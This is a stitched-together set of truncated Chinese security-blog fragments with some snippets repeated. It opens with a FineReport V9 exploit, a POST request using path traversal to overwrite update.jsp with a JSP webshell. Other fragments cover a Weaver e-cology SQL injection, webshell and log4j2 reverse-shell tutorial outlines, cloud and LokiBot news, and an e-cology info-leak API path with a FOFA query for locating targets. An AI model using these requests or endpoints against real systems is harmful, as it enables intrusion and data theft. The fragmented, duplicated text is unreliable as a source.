0x00任意文件上传漏洞【FineReportV9】 0x01漏洞描述此漏洞是任意文件覆盖，上传JSP马，需要找已存在的JSP文件进行覆盖，寻找Tomcat启动帆软后默认存在的JSP文件0x02漏洞详情POST/WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jspHTTP/1.1Host:x.x.x.xUpgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win

云安全公司OrcaSecurity在谷歌云构建（GoogleCloudBuild）服务中发现了一个关键的设计漏洞，该漏洞会让攻击者的权限升级，使他们可以在未经授权的情况下访问谷歌构件注册表（GoogleArtifactRegistry）代码库。该漏洞被称为"Bad.Build"，可使威胁者冒充谷歌云构建管理的服务账户，针对构件注册表运行API调用，并控制应用程序映像。这样，他们就可以注入恶意代码，从而在客户环境中部署恶意软件，导致潜在的供应链攻击。Orca安全研究员RoiNisimi表示：潜在的威胁可能是多种多样的，所有使用构件注册中心作为主要或次要镜像库的组织都应该警惕。最直接的影响是破坏依

文章目录前言声明一、产品介绍二、漏洞描述三、影响范围四、漏洞分析五、漏洞复现六、SQLMAP漏洞利用七、修复方案前言泛微E-Cologyv9Browser.jsp存在SQL注入漏洞，攻击者可通过该漏洞获取服务器数据库敏感信息。声明本篇文章仅用于漏洞复现与技术研究，请勿利用文章内的相关技术从事非法测试，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！一、产品介绍泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。二、漏洞描述泛微新一代移动办

大家好！我是小黄，很高兴又跟大家见面啦！拒绝水文，从我做起！！！！未经允许，禁止转载，违者必究！！！！本实验仅适用于学习和测试，严禁违法操作！！！今天更新的是：P7漏洞类型详解_文件上传漏洞往期检索：小白渗透入门系列-目录微信公众号回复：【文件上传】，即可获取本文全部涉及到的工具。创建时间：2021年5月9日软件：MindMasterPro漏洞类型详解_文件上传漏洞一、WebShell与WebShell管理工具1.1什么叫做WebShell？1.2WebShell有什么作用呢？1.2.1让我们拿举个例子(一句话木马)来讲：1.2.2大马有什么作用呢?1.3WebShell之PHP一句话木马解读

大家好！我是小黄，很高兴又跟大家见面啦！拒绝水文，从我做起！！！！未经允许，禁止转载，违者必究！！！！本实验仅适用于学习和测试，严禁违法操作！！！今天更新的是：P7漏洞类型详解_文件上传漏洞往期检索：小白渗透入门系列-目录微信公众号回复：【文件上传】，即可获取本文全部涉及到的工具。创建时间：2021年5月9日软件：MindMasterPro漏洞类型详解_文件上传漏洞一、WebShell与WebShell管理工具1.1什么叫做WebShell？1.2WebShell有什么作用呢？1.2.1让我们拿举个例子(一句话木马)来讲：1.2.2大马有什么作用呢?1.3WebShell之PHP一句话木马解读

文章目录漏洞简介log4j2教程环境搭建测试运行专业名词解释及其payload分析利用工具简介：log4j2漏洞验证（弹出计算器版）被攻击者的log4j2打印函数示例攻击者执行操作漏洞复现log4j2漏洞验证（DNSlog版）DNSlog如何玩在vulfocus靶场验证log4j2漏洞log4j2靶场学习（反弹shell版）靶场环境代码简要分析被攻击者信息攻击者的操作攻击绕过相关参考漏洞简介ApacheLog4j2是一个基于Java的日志记录工具。ApacheLog4j2.xlog4j2教程这里简要log4j2的使用方法以及代码示例环境搭建搭建log4j2环境的主要难点在于引入三方库，主要有m

文章目录漏洞简介log4j2教程环境搭建测试运行专业名词解释及其payload分析利用工具简介：log4j2漏洞验证（弹出计算器版）被攻击者的log4j2打印函数示例攻击者执行操作漏洞复现log4j2漏洞验证（DNSlog版）DNSlog如何玩在vulfocus靶场验证log4j2漏洞log4j2靶场学习（反弹shell版）靶场环境代码简要分析被攻击者信息攻击者的操作攻击绕过相关参考漏洞简介ApacheLog4j2是一个基于Java的日志记录工具。ApacheLog4j2.xlog4j2教程这里简要log4j2的使用方法以及代码示例环境搭建搭建log4j2环境的主要难点在于引入三方库，主要有m

据TheHackerNews7月17日消息，网络攻击者正利用有远程代码执行缺陷的MicrosoftWord文档作钓鱼诱饵，在受感染的系统上投放名为LokiBot的恶意软件。LokiBot亦称为LokiPWS，是一款自2015年以来就一直活跃的信息窃取木马，主要针对Windows系统。FortinetFortiGuard实验室的研究人员自今年5月发现了该恶意软件对MicrosoftWord文档的恶意利用，并表示这些攻击利用CVE-2021-40444和CVE-2022-30190（又名Follina）来实现代码执行。将CVE-2021-40444武器化的Word文件包含一个嵌入在XML文件中的外

未授权访问漏洞漏洞介绍：未授权访问漏洞就是在不需要请求授权的情况下对需要授权的功能进行访问执行，通常是由于认证页面存在缺陷，安全配置不当。漏洞原理：未授权访问是系统对用户的限制不全，或者无限制，可以让用户或者限制访问的用户，访问到内部的敏感信息，执行权限之外的功能。越权漏洞：水平越权：水平越权是同等权限下，不同用户直接的切换，访问到对方的敏感信息，造成信息泄露。垂直越权：垂直越权是在低权限用户下，可以执行高权限用户的功能。漏洞危害：未授权访问通常会造成以下几点危害：（简要概括）泄露用户信息，系统信息执行系统命令，操作系统文件，导致系统整体安全遭到破坏常见的未授权访问漏洞1、Redis未授权访问

漏洞描述i⭐泛微OAE-Cology信息泄露API接口漏洞只针对e-cologyv9.0版本才有用,JS文件中有一个API接口漏洞影响s✅E-cology=9.0空间测绘d⭕FOFA：app="泛微-协同办公OA"漏洞复现访问首页✅路径/api/ec/dev/app/test我的个人博客https://gylq.gitee.io/time/